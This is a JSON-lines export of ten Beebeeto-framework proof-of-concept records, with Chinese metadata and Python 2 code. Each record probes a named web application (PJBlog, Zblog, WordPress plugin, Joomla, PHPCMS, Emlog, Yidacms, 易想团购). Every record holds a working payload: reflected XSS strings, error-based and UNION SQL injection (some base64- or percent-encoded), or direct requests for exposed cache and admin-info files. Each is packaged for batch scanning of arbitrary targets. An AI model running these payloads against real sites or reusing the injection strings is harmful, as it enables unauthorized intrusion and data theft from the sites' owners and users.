{"create_date": "2014-12-09 23:02:42", "name": "PJBlog 3.0.6.170 /Getarticle.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "PJBlog\u6f0f\u6d1e,xss\u6f0f\u6d1e,/Getarticle.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0187',\r\n 'name': 'PJBlog 3.0.6.170 /Getarticle.asp XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PJBlog',\r\n 'vul_version': ['3.0.6.170'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['PJBlog\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/Getarticle.asp','asp'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.asp',\r\n 'references': ['http://sebug.net/vuldb/ssvid-11237',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/Getarticle.asp?id=1&blog_postFile=x%22%20)></a>%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E&page=2'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from 
pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.asp", "app_name": "PJblog", "id": "poc-2014-0187", "layer4_protocol": null}
{"create_date": "2014-12-09 22:08:37", "name": "Zblog 1.8 /search.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Zblog\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0184',\r\n 'name': 'Zblog 1.8 /search.asp XSS\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Zblog',\r\n 'vul_version': ['1.8'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Zblog\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.asp', 'asp'],\r\n 'desc': '''\r\n search.asp\u5728\u5bf9\u7528\u6237\u63d0\u4ea4\u6570\u636e\u5904\u7406\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['http://sebug.net/vuldb/ssvid-19246',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/search.asp?q=%3Ciframe%20src%3D%40%20onload%3Dalert%281%29%3E'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<iframe src=@ onload=alert(1)>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", 
"desc": "search.asp\u5728\u5bf9\u7528\u6237\u63d0\u4ea4\u6570\u636e\u5904\u7406\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002", "app_name": "Z-blog", "id": "poc-2014-0184", "layer4_protocol": null}
{"create_date": "2014-12-09 19:03:49", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /subscribe.php unsubscribe\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/subscribe.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0181',\r\n 'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /subscribe.php unsubscribe\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n 'vul_version': ['1.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/subscribe.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://www.it165.net/safe/html/201308/701.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/subscribe.php?act=unsubscribe&code=YScgYW5kKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50K\"\r\n \"CopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHg3ZSxtZDUoNjY2KSwweDdlKS\"\r\n \"kpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBsaW1pdCAwLDEpLGZsb29yKHJhbmQoMCkqMik\"\r\n \"peCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSM=\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if 
args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0181", "layer4_protocol": null}
{"create_date": "2014-12-09 18:57:23", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /vote.php dovote\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/vote.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0180',\r\n 'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /vote.php dovote\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n 'vul_version': ['1.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/vote.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://wooyun.org/bugs/wooyun-2010-03969',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(666),\"\r\n \"0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 
verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0180", "layer4_protocol": null}
{"create_date": "2014-12-09 18:39:09", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /ajax.php check_field\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ajax.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0178',\r\n 'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /ajax.php check_field\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n 'vul_version': ['1.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ajax.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://www.2cto.com/Article/201304/203406.html',\r\n 'http://vul.jdsec.com/index.php/vul/JDSEC-POC-20141208-1321',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/ajax.php?act=check_field&field_name=%61%27%20%61%6E%64%28%73%65%6C%65%63%74%20\"\r\n \"%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63\"\r\n \"%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20\"\r\n \"%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37\"\r\n 
\"%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D\"\r\n \"%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72\"\r\n \"%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F\"\r\n \"%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if '63e1f04640e83605c1d177544a5a0488' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0178", "layer4_protocol": null}
{"create_date": "2014-12-09 18:08:15", "name": "Emlog <4.2.1 /content/cache/user \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "EMLOG\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/content/cache/user,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0177',\r\n 'name': 'Emlog <4.2.1 /content/cache/user \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'EMLOG',\r\n 'vul_version': ['<4.2.1'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['EMLOG\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/content/cache/user', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/content/cache/user , /content/cache/options',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-02955',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload1 = '/content/cache/user'\r\n payload2 = '/content/cache/options'\r\n verify_url = args['options']['target'] + payload1\r\n verify_url2 = args['options']['target'] + payload2\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] Request URL: ' + verify_url2\r\n # user\r\n content = urllib2.urlopen(verify_url).read()\r\n # options\r\n content2 = 
urllib2.urlopen(verify_url2).read()\r\n if args['options']['target'] in content2 and 'avatar' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/content/cache/user , /content/cache/options", "app_name": "Emlog", "id": "poc-2014-0177", "layer4_protocol": null}
{"create_date": "2014-12-08 18:01:44", "name": "WordPress Sexy Squeeze Pages Plugin XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "nick233", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "WordPress\u63d2\u4ef6\u6f0f\u6d1e,XSS\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0176',\r\n 'name': 'WordPress Sexy Squeeze Pages Plugin XSS\u6f0f\u6d1e POC',\r\n 'author': 'nick233',\r\n 'create_date': '2014-12-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['*'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['WordPress\u63d2\u4ef6\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n Cross site scripting has benn found on instasqueeze/lp/index.php\r\n inurl:wp-content/plugins/instasqueeze\r\n ''',\r\n 'references': ['https://www.yascanner.com/#!/x/11200',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/wp-content/plugins/instasqueeze/lp/index.php?id=\"/><script>alert(233)</script>'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\"/><script>alert(233)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import 
pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Cross site scripting has been found on instasqueeze/lp/index.php\r\ninurl:wp-content/plugins/instasqueeze", "app_name": "WordPress", "id": "poc-2014-0176", "layer4_protocol": null}
{"create_date": "2014-12-04 18:22:34", "name": "Yidacms v3.2 /Yidacms/user/user.asp \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Yidacms\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/Yidacms/user/user.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0172',\r\n 'name': 'Yidacms v3.2 /Yidacms/user/user.asp \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Yidacms',\r\n 'vul_version': ['3.2'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Yidacms\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/Yidacms/user/user.asp', 'asp'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/Yidacms/admin/admin_syscome.asp',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-074065',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/yidawap/syscome.asp?stype=safe_info'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\u670d\u52a1\u5668\u76f8\u5bf9\u4e0d\u5b89\u5168\u7684\u7ec4\u4ef6\u68c0\u6d4b' in content:\r\n args['success'] = True\r\n 
args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/Yidacms/admin/admin_syscome.asp", "app_name": "yidacms", "id": "poc-2014-0172", "layer4_protocol": null}
{"create_date": "2014-11-30 21:07:42", "name": "Joomla Component com_departments\u63d2\u4ef6 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Joomla\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,com_departments,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0170',\r\n 'name': 'Joomla Component com_departments\u63d2\u4ef6 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-11-30',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Joomla\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'com_departments', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://sebug.net/vuldb/ssvid-19358',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/index.php?option=com_departments&id=-1 UNION SELECT 1,md5(666),3,4,5,6,7,8--\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": 
"Joomla", "id": "poc-2014-0170", "layer4_protocol": null}
{"create_date": "2014-11-30 20:55:07", "name": "PHPCMS 2007 /digg_add.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "PHPCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/digg_add.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0169',\r\n 'name': 'PHPCMS 2007 /digg_add.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-11-30',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPCMS',\r\n 'vul_version': ['2007'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['PHPCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/digg_add.php', 'php'],\r\n 'desc': 'PHPCMS 2007 /digg_add.php mod\u53c2\u6570\u672a\u8fc7\u6ee4\u5e26\u5165sql\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/digg/digg_add.php?id=1&con=2&digg_mod=digg_data WHERE 1=2 +and(select 1 from(\"\r\n \"select count(*),concat((select (select (select concat(0x7e,md5(3.1415),0x7e))) from \"\r\n \"information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.\"\r\n \"tables group by x)a)%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '63e1f04640e83605c1d177544a5a0488' in 
content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PHPCMS 2007 /digg_add.php mod\u53c2\u6570\u672a\u8fc7\u6ee4\u5e26\u5165sql\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165", "app_name": "phpcms", "id": "poc-2014-0169", "layer4_protocol": null}
